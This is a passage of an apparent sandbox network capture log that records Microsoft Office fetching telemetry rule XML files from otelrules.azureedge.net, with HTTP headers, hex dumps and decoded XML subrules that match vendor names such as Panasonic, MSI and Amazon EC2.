              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
              ETag: "0x8DC582BA909FA21"
              x-ms-request-id: b5d3fb3c-c01e-000b-6fb4-42e255000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234125Z-174f7845968vqt9xhC1EWRgten00000010sg0000000027qw
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


              Session IDSource IPSource PortDestination IPDestination Port
              40192.168.2.44980313.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:25 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:26 UTC491INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:26 GMT
              Content-Type: text/xml
              Content-Length: 423
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
              ETag: "0x8DC582BB7564CE8"
              x-ms-request-id: 9dc9d887-801e-0015-73b3-42f97f000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234126Z-174f7845968glpgnhC1EWR7uec00000010pg00000000nza8
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              X-Cache-Info: L1_T2
              Accept-Ranges: bytes
              2024-11-29 23:41:26 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


              Session IDSource IPSource PortDestination IPDestination Port
              41192.168.2.44980213.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:25 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:26 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:26 GMT
              Content-Type: text/xml
              Content-Length: 486
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
              ETag: "0x8DC582B92FCB436"
              x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234126Z-174f7845968kvnqxhC1EWRmf3g0000000mb000000000fz3n
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:26 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              42192.168.2.44980413.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:27 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:28 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:27 GMT
              Content-Type: text/xml
              Content-Length: 478
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
              ETag: "0x8DC582B9B233827"
              x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234127Z-174f7845968cdxdrhC1EWRg0en00000010fg00000000msv5
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:28 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              43192.168.2.44980513.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:27 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:28 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:27 GMT
              Content-Type: text/xml
              Content-Length: 404
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
              ETag: "0x8DC582B95C61A3C"
              x-ms-request-id: e52ede4a-001e-0017-0591-3f0c3c000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234127Z-174f7845968xlwnmhC1EWR0sv800000010k0000000001tpa
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:28 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


              Session IDSource IPSource PortDestination IPDestination Port
              44192.168.2.44980613.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:27 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:28 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:27 GMT
              Content-Type: text/xml
              Content-Length: 468
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
              ETag: "0x8DC582BB046B576"
              x-ms-request-id: 490736a9-701e-0097-7e01-42b8c1000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234127Z-174f78459684bddphC1EWRbht400000010a000000000fc8x
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:28 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              45192.168.2.44980813.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:27 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:28 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:28 GMT
              Content-Type: text/xml
              Content-Length: 479
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
              ETag: "0x8DC582BB7D702D0"
              x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234128Z-174f7845968qj8jrhC1EWRh41s00000010gg00000000eyx9
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:28 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              46192.168.2.44980713.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:28 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:28 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:28 GMT
              Content-Type: text/xml
              Content-Length: 400
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
              ETag: "0x8DC582BB2D62837"
              x-ms-request-id: 6760f0bc-801e-002a-1f91-3f31dc000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234128Z-174f7845968psccphC1EWRuz9s00000010t000000000hpey
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:28 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


              Session IDSource IPSource PortDestination IPDestination Port
              47192.168.2.44981013.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:29 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:30 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:30 GMT
              Content-Type: text/xml
              Content-Length: 475
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
              ETag: "0x8DC582BB2BE84FD"
              x-ms-request-id: fdf69e8b-201e-000c-4300-4279c4000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234130Z-174f7845968glpgnhC1EWR7uec00000010qg00000000gq0g
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:30 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              48192.168.2.44980913.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:29 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:30 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:30 GMT
              Content-Type: text/xml
              Content-Length: 425
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
              ETag: "0x8DC582BBA25094F"
              x-ms-request-id: d2a0c1bd-101e-0017-761b-4147c7000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234130Z-174f7845968pght8hC1EWRyvxg00000003p000000000nge6
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:30 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


              Session IDSource IPSource PortDestination IPDestination Port
              49192.168.2.44981113.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:29 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:30 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:30 GMT
              Content-Type: text/xml
              Content-Length: 448
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
              ETag: "0x8DC582BB389F49B"
              x-ms-request-id: c6635303-801e-0083-091e-41f0ae000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234130Z-174f7845968cdxdrhC1EWRg0en00000010n00000000068zb
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:30 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


              Session IDSource IPSource PortDestination IPDestination Port
              50192.168.2.44981213.107.246.63443
              TimestampBytes transferredDirectionData
              2024-11-29 23:41:30 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-11-29 23:41:30 UTC470INHTTP/1.1 200 OK
              Date: Fri, 29 Nov 2024 23:41:30 GMT
              Content-Type: text/xml
              Content-Length: 491
              Connection: close
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
              ETag: "0x8DC582B98B88612"
              x-ms-request-id: 22106228-c01e-007a-5d36-40b877000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241129T234130Z-174f7845968glpgnhC1EWR7uec00000010t000000000a8sh
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-11-29 23:41:30 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


              Session IDSource IPSource PortDestination IPDestination Port
              51192.168.2.44981313.107.246.63443
              TimestampBytes transferredDirectionData
